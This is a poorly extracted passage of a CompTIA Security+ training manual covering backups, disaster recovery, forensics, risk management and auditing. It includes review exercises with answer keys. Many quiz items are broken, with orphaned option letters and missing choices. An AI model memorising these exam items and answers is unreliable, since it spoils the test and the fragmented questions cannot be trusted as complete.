The father-son method combines a full backup and several differential or incremental backups each week. An incremental or differential backup is performed every day of the week, except Friday or the weekend, when a full backup is performed. This method allows you to retrieve files archived from the previous day, by using the weekly full backup and then restoring the incremental or differential backup(s). The grandfather-father-son method is most commonly used. This method uses the father-son backup on a weekly basis, with the weekly full backup held for an entire month. At the end of the month, a special monthly backup is made, which is kept for one year. This method allows you to archive files for up to a year. Remote backups In many backup solutions, communications between a client and server are an open conversation, which means that every file being backed up over the network is sent in clear text. If the production network has high security integrity and a secure firewall in place, this should not be a problem. If the communication is taking place over a WAN connection or outside of the firewall, a virtual private network (VPN) can be used to protect the integrity of the data. Another option is to encrypt the data on the server, so only authorized users can decrypt the data into a usable format. Even a backup that takes place in an open conversation would then be protected.
Offsite storage
Organizations with extensive business-critical data processing and storage requirements should also assess the need for offsite operational facilities. If computer and data access are absolutely necessary for business function, then offsite facilities might be one of the most important components of an effective disaster recovery plan. Offsite facilities allow the business to resume operations if the physical plant suffers a devastating loss, as in the case of the World Trade Center disaster. The three main types of offsite facilitieshot site, warm site, and cold siteare outlined in the following table.
165
Warm Site
Less expensive. Usually exclusive use. Available for long time frames.
Cold Site
One option that many organizations pursue is to sign a reciprocal backup agreement with another organization; this means that two parties back up and store each others data. This is a very cost-effective (though not necessarily reliable) way to keep data in separate locations. Another option is to use one of a myriad of Internet-based backup services or various service bureaus that provide the data backup service for a fee. The most expensive, but perhaps most secure, way to back up data is to build and manage a completely redundant in-house network over which the organization has complete control. This level of redundancy may not be necessary for all businesses, but businesses that use the network to address customers, process orders, and keep track of secure transactions should take action to have a hot system available should the need arise. Without such a system, the business might not be able to continue through the disaster recovery process.
Secure recovery
The backup plan should include procedures for proper restoration of the data, should it become necessary. A backup cannot be relied upon until personnel have attempted to actually restore it to a system. Organizations should conduct incident training in which an actual copy of a sample systems data is restored to a backup or secondary system. Spot-checking the readiness to restore systems both checks the effectiveness of backup methods and keeps personnel trained for a quick restore of the system.
166
CompTIA Security+ Certification Alternate sites If disaster strikes and you have to recover from an offsite location or alternate site that was previously configured for just such a situation, things can nonetheless get sticky. If at all possible, practice recovery procedures in such a scenario. Develop a plan that outlines what exact steps need to be taken to recover using the alternate site and then carry out the plan. At the very least, make sure that key personnel in your organization are comfortable with the roles they would have to play and actions they would have to take in the event of having to use an alternate site to recover after a disaster. Alternate sites should preferably not be in close proximity to your organization's current location, but should still be relatively easily accessible, preferably within driving distance. Say, for example, a hurricane destroys your town. If your alternate site is in the same town, it was probably destroyed, too, and wouldn't be of any use to you anymore. The hurricane may, however, not have touched areas a few towns over or the next closest metropolitan area. Of course, it's impossible to identify a perfect location as one cannot predict the nature or magnitude of a disaster. However, when deciding on a location for an alternate site, distance to the current location should be a balance between practicality and likelihood of the physical extent of a disaster. A general rule to consider is to place an alternate site a minimum of 50 km away. If you live in areas prone to Earthquakes, don't place your alternate site somewhere on or near the same fault line as the one your current location is nearest.
167
To successfully prepare for system failures, an organization must identify potential threats and analyze what needs to be achieved in order to continue operating as though nothing had happened. Critical information and equipment need to be identified, and procedures must be documented for system and data restoration. After these activities have taken place, network managers can determine how best to protect or restore the mission-critical information systems. A successful disaster recovery plan must rely on thorough planning and testing, and must include provisions for business continuity, without which it would likely fail. Disaster recovery team The disaster recovery team should include members of senior management, members of the Information Technology department that will perform the assessment and recovery, representatives from facilities management, and representatives from the user community affected by the event. Each department should be represented because each will have its own objectives and priorities during a crisis. Each team member must know his or her function, which could include coordinating other department personnel, contacting outside emergency agencies, or summoning equipment and service vendors. The most important step in managing potential crises is to have the proper team assembled, trained, and ready to respond at a moments notice. Business impact assessment
Explain to students that they will use the business impact assessment to determine how much to spend on the plan, based on the costs of recovery vs. the costs of downtime. In other words, if the company will lose $100,000 per hour of downtime in a disaster, how much will it cost to have a plan that will restore operations in less than an hour? If the costs are $250,000 to restore operation in an hour but only $100,000 to restore operations in two hours, then perhaps the plan should be geared toward a two-hour recovery.
The next step in the disaster recovery planning process is performing the business impact assessment. The business impact analysis will identify your most critical functions and how they would be affected by a disaster. The time frame of the recovery process is the responsibility of the organization. The time frame should reflect the cost of the failure in terms of loss of revenue, cost of the recovery vs. the cost of the lost revenue, and any acceptable workarounds. Once the allowable outage time has been determined, the feasibility and cost of the recovery must be determined. These issues should be studied carefully, because the expense of recovering from the disaster may be much smaller than the actual loss of revenue and reputation that a company could suffer from not having a solid continuity plan. Some organizations find it helpful to categorize various business functions into categories. For example, the Massachusetts Institute of Technology has published its Disaster Recovery and Business Resumption Plans, which include the following categories: Category I CriticalMust be restored to maintain normal processing. Category II EssentialWill be restored as soon as resources become available, not to exceed 30 days. (This period is specific to MIT. The length of time in which an essential system should be restored depends on the relative business loss of not restoring it for that time.) Category III NecessaryWill be restored as soon as normal processing is restored; data must be captured and saved for subsequent processing. Category IV DesirableWill be suspended for the duration of the emergency.
168
CompTIA Security+ Certification Business resumption and continuity plan The business continuity plan (BCP), also called the contingency plan, includes details about how to keep the business running when any key component fails. This information includes the personnel responsible for the recovery process, their assignments, the functions that must be operational first, and the process for reinstating key components. Typically, the BCP includes the following items: A responsibilities checklist for all members of the BCP team. This list should include contact phone numbers, responsibilities, and backup personnel. List of emergency contacts, such as police, fire department, utility companies, and top-level management. Warning system to notify customers and employees that an emergency has occurred and how the plan will proceed. Damage assessment, control, and containment procedures. Recovery procedures for critical systems. Location and access information for remote backup facilities or offsite operational facilities. Documentation The disaster recovery plan requires that each phase of disaster recovery be carefully documented. Instructions should be concisely worded so that anyone can follow them without further clarification. The documentation should include the following: System configurations for all servers, firewalls, routers, and other key network devices. Include any major modifications done and all patches applied since the systems were placed into production. Also, remember to include key passwords. This document is necessary to restore all vital applications. Networking and facilities diagrams. Include diagrams or blueprints of all networking and facilities infrastructure so that it can be re-created at a new site. Vendor and supplier lists, in case new equipment needs to be ordered to replace compromised or damaged equipment. This document should also include procedures to assist in a rapid acquisition process. The documented backup plan as defined earlier in this unit. The backup procedures must be exhaustively documented with step-by-step instructions on how the backups are done, when they are done, and what information is included. This level of documentation is critical if the systems have to be reconstructed quickly to restore business functionality.
Document storage
All of these documents must be stored in multiples sites: on a hard drive that is consistently backed up; as hard copies stored in various secured cabinets or safes in various offices; and at the offsite storage facility. This redundancy is to ensure that a copy of the disaster recovery plan is accessible at all times should the need to retrieve it arise. This accessibility allows a rapid response to the disaster, thus helping to minimize the business continuity challenges. Note that all copies should be secured because the documentation will likely include key passwords, file structure documentation, and other mission-critical information that could be used to re-create data if necessary.
169
A-1:
Exercises
1 _________ backups will back up all files selected on a system, whereas _________ backups will save only those files that have been modified since the previous backup, and __________ backups will save only those files that have been changed since the last full backup.
Full, incremental, differential
3 The ____________ rotation method performs an incremental or differential backup every day of the week except Friday, when a full backup is performed. This allows you to retrieve files archived from the previous day, by using the weekly full backup and then restoring the incremental or differential backup(s). A
B
C D
5 Which of the following is an offsite facility that supplies a basic computing environment (wiring, ventilation, plumbing) but no computer hardware? A B
C
6 Which of the following documents are found in the disaster recovery plan? (Choose all that apply.)
A B C
A list of the covered disasters A list of the disaster recovery team members for each type of situation and their contact information A business impact assessment Code of ethics Backup and restore documentation
D
E
All network administrators A member of senior management Members of the Information Technology department All backup operators Representatives from facilities management Representatives from the user community
D
E F
1611
Redundancy
Explanation Business continuity focuses on ways to continue your business activities despite equipment failure or destruction. One way to help protect an organizations assets is to have a good deal of redundancy built into all mission-critical systems. These backup systems will be capable of filling in for the main systems until the damage can be repaired. A company that cannot function after a data-loss disaster is a company that will most likely suffer an unrecoverable loss as a result.
Utilities
Discontinuation of utilities, such as electricity, water, and transportation, can greatly affect a companys operations. Natural disasters such as snowstorms and tornados can create blackouts and cause equipment failure and absenteeism of critical personnel. To continue normal business functions, administrators need to have contingency equipment and personnel on standby to continue business operations despite adversities. When power outages occur, uninterruptible power supplies (UPSs) can switch over to battery backup and keep attached devices running for up to several hours, allowing time for the administrator to execute a normal shutdown. Additional measures, such as using gas-operated generators, may be implemented to keep servers running. If telephone service is interrupted due to a disaster, then mobile phones and e-mail through broadband access offer alternatives. If postal mail delivery stops, you might need to arrange for mail to be delivered to a different branch office. The key is to identify critical services and provide an alternative method for each one.
Backups
As discussed previously, backing up your data is the most important measure you can take to ensure business continuity. Computers and network equipment can be replaced, but your data is irreplaceable. To prepare for possible disaster, back up your data on a daily basis and store a copy offsite.
1613
B-1:
3 What is clustering?
Clustering is a technology in which several servers jointly perform a single task. Server clustering is also used for fault tolerance: when one server goes down, another takes over.
4 RAID Level __ stores identical copies of the data on multiple disks. If one disk fails, another disk continues to operate. Additional fault tolerance is achieved by duplexing (using separate disk controllers for each disk).
1
5 RAID Level __ writes data across three or more drives, but one drive is used to store the parity bits for each byte that is written to the other disks. When a disk fails, it can be replaced, and the data can be restored to it from the parity information.
3
Security policy
A security policy is a general statement produced by senior management and the Information Technology department to dictate what security means to the organization. The document should establish how the security program is organized, what the policys goals are, with whom responsibility falls, and what the strategic value of the policy is. An effective policy should include sections on acceptable use, due care, privacy, separation of duties, need-to-know issues, password management, service-level agreements, and the destruction or disposal of information and storage media.
1615
Ask students what legal issues they think should be covered in the acceptable-use policyboth those that protect employees and those that protect the company. Some issues that should be discussed include sexual harassment, copyright, and piracy.
Acceptable-use policies address the use of computer equipment and network resources for personal use or use that is not benefiting the company. The goals of the policy are to meet productivity goals of the Human Resources department, meet liability concerns of the Legal department, protect critical information and technical resources, and maintain the security goals of the Information Technology department. Organizations have been concerned about the misuse of computer resources and its impact on business activity for some time. As Internet use has grown, so has the abuse of business resources for personal use. Many studies have focused on the impact this type of misuse has on productivity and the lost revenue associated with it. Lost productivity is not the only concern, however. Just as damaging are situations in which company information is compromised by employees using the Internet to communicate sensitive information to external parties, by the use of company resources to view sexually explicit or socially unacceptable Web pages, or when an organization is held legally responsible for promises made by an employee using the companys e-mail system. An acceptable-use policy should cover what is and is not considered appropriate use of company resources and time. The document should be read and signed by employees when they are hired, and held in the employee file in case of any future violations. The enforcement mechanism of the policy should also be well-established to ensure that all employees understand the consequences of their actions. Due care To exercise due care means that reasonable precautions are being taken; these indicate that an organization is being responsible. If a corporation were to experience a major security-related incident that escalated because of a lack of countermeasures or incident response, those who are adversely affected (shareholders, business partners, customers) may have grounds for suing on the basis of lack of exercise of due care. By establishing a solid security policy and adhering to its basic tenets, a company can prove that it has exercised due care and can protect itself from lawsuits. Privacy When implementing a security policy, managers must understand the necessity of protecting customer and supplier data. By securing this data, an organization can solidify the trust it has between itself and any external parties with confidential information on the organizations network. This information can consist of financial information, Social Security numbers, partner contracts, sale prices, and so forth. If an organization does not respect its clients and partners right to privacy, it can lose the trust of those parties, or in some cases face legal action for intentionally or unintentionally divulging that information.
The bottom line here is that nobody in the organization should be seen as irreplaceable, because one day he or she likely will be replaced, and the smoother the transition, the better. Explain that many employees purposely provide poor documentation of their work so that it will be that much harder to know how to replace their duties. The company may then have a dilemma: pay this person what he/she demands, or incur the costs of lost productivity when he/she leaves. The best strategy is to incur the costs and make sure the next person does not leave you in such a predicament.
1617
The plan should also include training on proper password procedures. IT management may want to use password-scanning tools to find weak passwords. If weak passwords are found on the system, the users responsible for the weak passwords should be notified and instructed on how to create stronger passwords. Service-level agreements A service-level agreement (SLA) is a contractual understanding between a service provider and the end user, which binds the provider to a specified and documented level of service. A well-constructed SLA should include specific levels of service and support and should include penalty clauses in the event that the services or support are not provided. An organization should specifically request a disaster recovery plan with any SLA. If the service provider goes down or has a service interruption, all organizations using the service could suffer as if the outage were their own. Backup plans need to be in place in case of a provider failure. These plans must include a short-term solution to ensure business continuity during the initial recovery period. Disposal and destruction Many companies that have established strong system-access guidelines carelessly dispose of documents, systems, and media that contain data or could potentially help to compromise systems. Most people do not consider the need to properly dispose of old storage media and unused equipment. Deleting files, reformatting, and overwriting disks does not completely eliminate all information. The best way to dispose of important information or hardware that contains such information is to have the medium degaussed. Degaussing is the process of demagnetizing the media so all information is rendered useless. Another technique that effectively disposes of data is zeroization, which overwrites all data with zeros. A more extreme approach is physical destruction, whether that means breaking floppy disks and destroying the magnetic disk inside or physically destroying equipment. This is often the surest way to dispose of critical information. In addition to disposing of storage media and unused equipment, companies need to destroy hard copies of any vital information by shredding, pulping, or burning it. An emergency destruction plan should be in place when organizations work with highly sensitive information such as data that is vital to national security, or work with the Department of Defense or other government agencies.
C-1:
2 Why is separation of duties an important measure to consider when developing a security policy?
Distributing high-risk activities among the technology community reduces the level of trust it places on one person and prevents a disgruntled employee from doing extensive damage to the network.
Minimum length Allowed character set Disallowed strings Duration of use of the password All of the above
1619
C-2:
2 Which of the following tasks should be performed with an employees termination? (Choose all that apply.)
A B
Conduct exit interviews professionally. Collect security badges and company property. Change all locks on the building. Escort the employee off the property. Deactivate the employees accounts and change passwords.
C
D E
1621
1623
C-3:
Use IDS to detect malicious code and analyze anomalies. Allocate sufficient resources to support an appropriate level of incident response. Ensure that the systems and applications used in handling incidents are resistant to attack. Identify who is to be contacted in the event of an incident, and list their responsibilities. Establish acceptable risk limits.
1625
Managing privileges for a group is essentially the same as managing privileges for an individual, except that you have a single entry in the access control list instead of many. The administrator creates a group, assigns members to the group, and then grants group privileges to all required network resources. Each member within the group automatically inherits all privileges granted to that group. Thus, if the Accounting group is granted Read/Write access to data within the Accounts Payable folder, any new employee added to the Accounting group automatically receives Read/Write privileges as well. Users can be members of several groups at once. The privileges assigned to each group of which the user is a member are combined to create the users effective permissions. Role management Some network OSs, such as Novell NetWare and Microsoft Windows 2000, allow the administrator to control access through roles. The administrator creates a role to represent a particular position or function within the organization, and then assigns resource privileges on a need-to-use basis. For example, an insurance company can create roles that include claims adjuster, actuary, underwriter, and account executive. Once the role is created, a user is assigned to the role, thereby inheriting all permissions granted to the role.
Single sign-on
Single sign-on (SSO) allows a user to log onto several servers or applications by using a single logon sequence. This eliminates the necessity to memorize a different password for each application. In addition, the administrator can manage the user accounts from a single, central location. Most network operating systems today provide some means of SSO. Microsoft and Novell use directory services to accomplish the single sign-on. The directory service issues a digital certificate after authentication to grant access to all authorized services within the directory. Alternatively, applications using Kerberos issue session tickets that can be used repeatedly to transparently sign onto other systems.
1627
D-1:
2 ______________ describes the privileges assigned to a particular user. By default, the file owner receives full control of any files or directories that he or she creates.
A
B C D
4 Single sign-on allows a user to log onto several servers or applications by using a single logon sequence. True or false?
True
Topic B
Topic C
Topic D
Review questions
1 Outages can be caused by various events. What are they? A Hardware failure B Network failure C Software error D Malicious attack
E
2 The best way to establish an incident response policy is to follow which distinct steps? (Choose all that apply.)
A B
Detection Containment
C Backup
D E
Preparation Eradication
F Auditing
1629
3 A disaster recovery plan defines the resources, actions, and data required to reinstate critical business processes that have been damaged or disabled because of a disaster. True or false?
True
4 Accidental threats are loss of power, transportation accidents, chemical contamination, and so forth. True or false?
True
Hot site
B Neutral site
C D
E Freeze site 6 An advantage of a hot site is that the site is ready for operation within hours. True or false?
True
7 A warm site has no hardware infrastructure, is not immediately available, and operational testing is not available. True or false?
False. This describes a cold site.
8 How far away from your organization's current location should an alternate site be minimally located?
50 km
9 An effective backup strategy should take into account what key issues? A How often should the backups be run? B What is the backup medium? C How long will backups be stored? D Will the backups be manual or automated? E How will backups be verified?
G
10 An incident response policy is a written policy that covers how to deal with a security incident after it has transpired. True or false?
True
11 Privacy policies are not legally enforceable, so they give consumers no recourse if their information is misused. True or false?
False. They are legally enforceable.
13 A full system restore can be difficult and time consuming, yet it offers the highest level of assurance that systems and network components have been returned to normal operational status. True or false?
True
14 Adopting an incident response methodology constitutes the practice of due care and, if need be, can be established as such in a court of law. True or false?
True
171
security.
E Explain the importance of documentation
172
Digital evidence
Digital evidence is essentially information and data of investigative value that is stored on or transmitted by an electronic system such as a computer. Such evidence is acquired when data, media, or hardware are collected and stored for examination purposes. Digital evidence is: Extremely volatile and susceptible to tampering Often concealed Sometimes time sensitive A knowledgeable expert that identifies possibilities that can be requested as relevant evidence can help speed up the discovery process during forensic investigations. For cases where computer disks are not actually seized or forensically copied, the forensics expert can more quickly identify places to search, signs to look for, and other potential information sources to be used as evidence during on-site inspections. Such evidence may take the form of earlier versions of data files that may still exist on computer hard disk drives, backup media, or differently formatted versions of data, either created or treated by applications (such as word-processing programs, spreadsheets, e-mail, graphic, or the like).
173
The Working Group proposed the following principles for collection, preservation, and access of digital evidence, which were voted upon by the IOCE delegates and gained unanimous approval: Investigation and analysis performed on the seized digital evidence should not change the evidence in any form. Except where necessary, evidence should only be manipulated and analyzed on a copy of the original source, leaving the actual violated data and hardware intact. An individual must be forensically competent in order to be given permission to access original digital evidence. Several organizations have created training programs and certificates in computer forensics, although none have emerged as a de facto standard. Despite this, there are a set of widely accepted methods and practices that are common to most programs and should be applied by any forensic analyst. All activity relating to the seizure, access, storage, or transfer of digital evidence must be fully documented, preserved, and available for review.
Forensic process
Digital evidence poses special challenges for its admissibility in court. To address such legal issues, the following steps should be employed. Preparation Preparation is the key to success in digital forensics. A little bit of effort before the breach ever happens can make the forensic process significantly easier, quicker, and more reliable. Appropriate training and the creation of toolkits for various operating systems are critical to a proper analysis. Collection of evidence Collection involves the search for and recognition, recovery, and documentation of digital evidence. Digital evidence may involve real-time or stored information that may be lost unless precautions are taken at the crime scene. Authentication Authentication involves the generation of mathematical validation codes of collected digital evidence. This helps resolve questions that might be raised during litigation about the accuracy of the evidence. Examination of evidence Examination helps to make the evidence visible and explain its origin and significance. It should document all components of the captured evidence in its entirety. Such documentation allows all parties to discover what is contained and presented by the evidence. This process includes the search for information that may be hidden or obscured. Analysis of evidence Analysis differs from the examination phase in that it inspects the outcome of the examination of the evidence for its significance and values to the case. Documenting and reporting of evidence Documentation is not really done as the last step in the sequence but is an ongoing process throughout the other steps. The type and format of documentation is partially dictated by the intended use of the report that is generated. An analysis that is performed primarily to generate a better patch to avoid future breaches may have substantially different documentation from one that is intended to be used in a criminal prosecution. There are other models with greater or fewer steps; however, all contain the same basic processes.
174
CompTIA Security+ Certification Preparation A good forensic analyst must be very much of a generalist, with broad experience and training. Because a security breach should only have happened because network or systems administrators were not prepared for it, understanding the methods used to gain access requires a breadth of knowledge. Experience in network function, intrusion detection techniques, logging, and operating system configuration are necessary. A good toolkit must be prepared in advance of the need for forensic analysis. Once a system has been breached, the best indication of how an attacker gained access may help focus the investigation on the compromised system. These toolkits should be set up as part of any good security system but should be established with forensics in mind dont assume that your users will be doing things that are expected. Collection of evidence If evidence is to be admissible in court, it must be handled properly. The data and memory on the system should be treated as the state of a crime scene and must not be modified, because it may be impossible to reconstruct. Even running forensic tools on a system to collect data may remove critical information from the system. Many forensic activities require administrator or root-level access and many actions taken with that authority cannot be undone. Forensic investigators should use the following guidelines as a basis for formulating the evidence collection procedure: Capture a picture of the system and its surroundings. You may even want to videotape the entire process while the analyst works on the system to have an undisputable record for later use. Keep detailed notes. These should include dates and times of all actions taken at the site. Because its difficult to keep up with all the output and potential system errors (and because installing a text capture program would modify the system), a good suggestion is to record the server and surrounding area with a video camera and then set it up on a tripod, focusing the camera at the terminal monitor. Limit direct access to the file system as you are collecting the evidence and avoid updating files or the directory access table. If possible, analysis should be done on a bit-level copy of the systems storage media, rather than the original. The original can be kept secure should the authenticity of the data ever come into question later. Volatility Collecting evidence may actually destroy other evidence. While collecting digital evidence, forensic investigators should proceed from the more volatile assets to the less volatile ones. Following is a typical order of volatility for most systems: Memory Registry, routing table, arp cache, process table Network connections Temporary files Disk or storage device
175
Digital evidence collection procedure should be documented in detail to avoid litigation issues. The documentation of collection procedures should lessen the amount of decision-making needed during the collection process. However, the analyst must modify his procedures to follow where the evidence leads, instead of blindly following a set of procedures. It is important to make sure that the methods of evidence collection are as transparent as possible. Such actions should not alter the media that holds the potential evidence. Investigators should be prepared to disclose the collection methods. Forensic investigators should pay close attention to the following guidelines: Do not run programs that modify files or their access times. Do not shutdown until the most volatile evidence has been collected. Do not trust the programs on the system. It is common to find that critical forensic tools have been modified with trojanized versions, which can provide false or misleading output. Collection steps Begin by making a list of all the systems, software, and data involved in the incident, as well as the evidence to be collected. Establish criteria regarding what is likely to be relevant and admissible in court. Remove all external factors that may cause accidental modification of the file system or system state. Perform a quick analysis of external logs and IDS output to provide a hint of where to focus the investigation on the target system. Following the levels of volatility, check the processes running on the system, looking for any that appear out of place and then copy the arp cache, routing table, registry, and status of network connections, including detecting promiscuous NICs. A good toolkit includes a utility to do a core dump of the memory, so that information can be maintained as well. Capture temporary files that may be deleted if the system is shutdown and rebooted. Remember to run all programs from a trusted read-only source and write the results to the screen and removable media. Finally, make a bit-by-bit copy of the entire media to a backup device. Once the backup is complete and all physical network structures and hardware specifications have been recorded, the original media should be removed and stored in a secure location. Further analysis can be done on the same or another system after the backup has been restored on another hard drive.
176
CompTIA Security+ Certification Authentication and evidence handling procedures It is important to be able to prove that neither the original data nor the analyzed data has been tampered with. Experienced computer forensic specialists rely upon mathematical validation to verify that the restored image of a computer disk drive and relevant files exactly match the contents of the original computer. Authenticating the evidence resolves questions about the accuracy of the restored mirror image that may be raised during litigation. Electronic signatures also act as a means of protection for the computer forensic specialist against potential allegations that files were altered or planted by law enforcement officials during the processing of the computer evidence. The physical media on which the digital evidence is stored must be carefully guarded. After removing it from the system, the disk or entire system should be placed in a container, which is labeled, sealed, signed, and dated in a manner in which tampering will be obvious. The container should be locked in a manner in which access is very limited to people who must have access. From that point on, only the copy of the data should be used for analysis, unless that becomes corrupt or the original is needed to validate the accuracy of the data on the copy. Part of the evidence-handling process must be to maintain a chain of custody to keep track of individuals that have accessed the evidence. Investigators should create a chainof-custody form and manage it very carefully during and after the forensic investigation. Mismanagement of chain of custody could result in legal complications, which can consequently prevent prosecution. A typical chain-of-custody form should include: The individual(s) who discovered the evidence. Exact location of evidence discovery. The date and time when the evidence was discovered. The individual(s) who initially handled or processed the evidence. The location, date, and time when the evidence was initially processed. Individuals who had custody of the evidence, the period during which they had custody, and how the evidence was stored during that period. When the evidence changed custody and when and how the transfer occurred. If the evidence changed possession, then the exchanging parties should sign the document. Examination and analysis After the evidence has been properly collected and documented, examination of each piece of data and how they relate to each other is performed in an attempt to recreate the crime. The focus is on answering the four questions of what, where, when, and how. If sufficient information is available, the questions of who and why may be pursued as well. This portion of the process is partially skill and experience and partially intuitionone clue may lead to others to develop an impression of what happened. Additional evidence may be required for further analysis in an attempt to positively establish the answers to the questions.
177
A-1:
Exercises
1 _______________ is information and data of investigative value that is stored on or transmitted by an electronic system such as a computer. A
B
C D
2 Arrange the following in the order of the forensic process: ___ Analysis ___ Collection ___ Examination ___ Preparation ___ Documentation 3 Which item is most volatile? A B C
D
4 2 3 1 5
Time sensitive Extremely volatile Highly susceptible to tampering Often concealed All of the above
5 The purpose of __________ is keeping track of persons who have accessed the evidence.
chain of custody
178
CompTIA Security+ Certification 6 The generation of mathematical validation codes of collected digital evidence is called ___________.
authentication
Where, when, and by whom was the evidence discovered? Where, when, and by whom was the evidence handled or examined? Who had custody of the evidence? During what period? How was it stored? What were the physical attributes of the discovered evidence?
8 Electronic __________ act as a means of protection for the computer forensic specialist against potential allegations that files were altered or planted by law enforcement officials during the processing of the computer evidence.
signatures
179
Managing risk
Explanation Unless an organization has unlimited resources, the network administrators will probably not be able to entirely secure everything under their control. Risk management is the process through which risks are identified and controls are put in place to minimize or mitigate the effects of resulting breaches. An analysis of risk, possible actions to mitigate or eliminate that risk, and the potential gains by implementing those actions should be done to determine appropriate security levels. In order to appropriately manage risk, valuable assets must be identified, and an assessment of risk to those assets must be made, including recognition of specific threats that would put those assets at risk. Finally, this process should result in a list of critical vulnerabilities that should be addressed.
Asset identification
Risk management starts with the identification of the assets that need protection. Assets are simply things that are of value. This usually includes data on the systems, as well as CPU time and network use, but may also include other system assets. In addition to identification, a value should be placed on each asset, as in how much would it cost to replace if it were lost, stolen, or became unavailable for a period.
Risk assessment
Risk is the potential for an occurrence that may put an asset in jeopardy. It is impossible to eliminate all risks associated with asset preservation. It is, however, important to control or reduce areas with high risk, particularly when the cost of realizing that risk is also high. Identification of risk is critical as is the enumeration of all known potential risks.
Threat identification
For a risk to be realized and an asset loss to be incurred, a corresponding threat must be present. For instance, an e-mail virus is not a threat on systems that do not handle e-mail in any way; and network breaches are much less of a threat on isolated systems or networks. For each risk identified in the previous section, related threats should be listed. This may be a cyclical processas threats are identified, other assets or risks may be uncovered, which will require further enumeration of threats.
B-1:
Exercises
1 Risk management starts with the identification of the assets that need protection. True or false?
True
Identify and quantify assets to be safeguarded. Measure the criticality of each asset by determining the impact of the loss of each asset. Purchase insurance to cover all potential threats. Identify and quantify the vulnerabilities associated with each asset when matched with each threat.
4 The greater the number and magnitude of ___________, the greater is the probability or risk that a loss event will occur.
threat
1711
Communication
Social engineering preys on human vulnerabilities and a natural willingness to help. Loose lips sink ships is as applicable to systems security as the Navy. Usernames and passwords must be conscientiously guarded. Information that may never be divulged over the phone should be clearly delineated in training. Personnel authorized to provide such information should require proof of positive identity from the requester or have a secure method for communicating the required information that is available only to the intended recipient.
Online resources
Online delivery of educational materials as well as policies and procedures is a very effective way of delivering important information to a large number of people. One option is to create specific directories on a companys network to which users and/or IT personnel have access. Another is to create one or more areas on a companys internal Web site or Intranet devoted to security and disaster recovery policies and procedures. These pages can include text as well as multi-media content, such as audio and video files. Further, IT personnel in particular can make use of resources on the Internet, such as knowledge bases and other manufacturers support web sites to help troubleshoot problems and obtain software updates and fixes.
1713
C-1:
2 Name three ways that user awareness training can enhance system security.
Helps prevent accidental data loss. Places each user on the overall system security team and raises awareness that may lead
a non-administrative user to identify a potential security problem or breach.
3 Which of the following items should be included in a custom-developed user security training and awareness package? (Choose all that apply.)
A B
Contacts and action in the event of a real or suspected security incident Legitimate use of system accounts Virus detection Overview of the network architecture Access and control of system media Sanitization of media and hard copies
C D
E F
4 Security-related pages on a companys internal Web site are an example of an online resource aimed primarily at IT personnel. True or false?
False
Topic D: Auditing
This topic covers the following CompTIA Security+ exam objective:
# 1.7 Objective Understand the concept and significance of auditing, logging and system scanning
System monitoring
Explanation The best security procedures are of limited value if those procedures are not tested to ensure that they work properly. In addition, it can never be assumed that these security procedures are the final word. Rather, the system must be continuously monitored to ensure that procedures provide the level of security that is required. Testing security procedures and monitoring their effectiveness are both aspects of auditing. Auditing is an essential element of an overall security policy. Without good auditing procedures, a system is left vulnerable to attacks. One important part of auditing involves monitoring the system. This includes monitoring access to network resources, such as files, as well as monitoring specific actions by users. The auditing information is written to a security log and includes information such as the identity of the user, the date and time of the action, and what action took place. Actions that can be monitored by logging include users signing on and signing off, modifying user or group account information, and reading and writing selected files. For each of these events, an audit entry into the security log will indicate if the action was a success or failure. Although recording all of these actions may make the log files very large, they can be filtered to display only selected records. Another option is to display only log failures. In addition to monitoring, another important part of auditing involves scanning the system. Network and system security scanning will reveal the vulnerabilities of the current system. Scanning also provides the following benefits: Enables corrective action to take place in a timely fashion Reduces the risk of attacks Avoids litigation from customers Reduces performance problems Qualifies for information protection insurance Reveals upgrades needed for future expansion System scanning typically involves two procedures. First, using well-known network and system assessment tools, the scan gathers information about the system and network configuration to determine vulnerable entry points that a hacker could use to gain access. Second, system scanning uses what is known as Penetration Testing. Tools commonly used by hackers are used to simulate an actual intruder attack, but in a controlled and safe environment. By attempting to penetrate the system, the scan can reveal the extent of vulnerabilities. System scanning typically includes penetration testing from in-house locations, the Internet, and through remote dial-in or broadband access.
1715
System security scanning may be performed either in-house or by a third party. Some companies have the necessary resources and choose to audit their own security. The advantage to performing a security audit in-house is that the system can be scanned whenever necessary, such as when new systems are installed or configurations are changed. However, the disadvantage of performing the scanning audit in-house is that the audit may not be objective. In addition, the skills and experience of in-house personnel may not be at the level needed. Third party scanners typically offer a comprehensive report that describes the vulnerabilities that were detected, the risk associated with each vulnerability, and recommendations for correcting the problem. Consulting companies that provide system-scanning services refer to it as a Security Vulnerability Assessment, Security Audit, or On-line Penetration Testing. The audit should give detailed information on what tools were used, how and when the scan was conducted, what vulnerabilities were scanned for, and list the vulnerabilities by risk level. A security scan should be conducted at least once per year. Companies that process financial transactions and medical records should conduct a security vulnerability assessment quarterly. Once a security vulnerability assessment has been performed, it is important to take corrective action immediately. This audit escalation means that the audit has revealed a problem and that its importance is adjusted accordingly. If a significant amount of time passes between when the audit occurs and when the corrective action is taken, many of the system settings may have changed, and the report from which the corrective action is being made may no longer be accurate. Some companies are reluctant to perform a security scan audit in the event that it reveals a security problem and then opens up the organization to litigation. Audit privilege laws are traditionally set up to protect participating companies from the disclosure of violations found during an audit. In return, the company is given advice on how to correct the problem in order to achieve the necessary level of security. Audit usage is also a key part of auditing. Audit usage monitors the usage of the system and provides valuable information for future capacity planning. The information provided helps determine, for example, whether investment in new applications provides a positive return by tracking when and how they are being used.
D-1:
Understanding auditing
Date and time of the action Identity of the user What action took place Whether the action was a success or failure All of the above
4 System scanning typically includes penetration testing from: (Choose all that apply.)
A B
Internal sources The Internet The firewall Remote dial-in or broadband access All of the above
C
D
What tools were used How and when the scan was conducted Which threats were detected What vulnerabilities were detected and their risk level Recommendations for correcting the problem
D E
6 An __________ ____________ is an indication that the audit has revealed a problem and its importance must be adjusted accordingly.
audit escalation
7 Discuss the pros and cons of doing security scanning in-house versus using a third party.
A third party will cost more but will also be more objective and thorough than using an inhouse team.
1717
Topic E: Documentation
This topic covers the following CompTIA Security+ exam objective:
# 5.9 Objective Understand and explain the following documentation concepts Standards and Guidelines Systems Architecture Change Documentation Logs and Inventories Classification Notification Retention / Storage Destruction
Change documentation
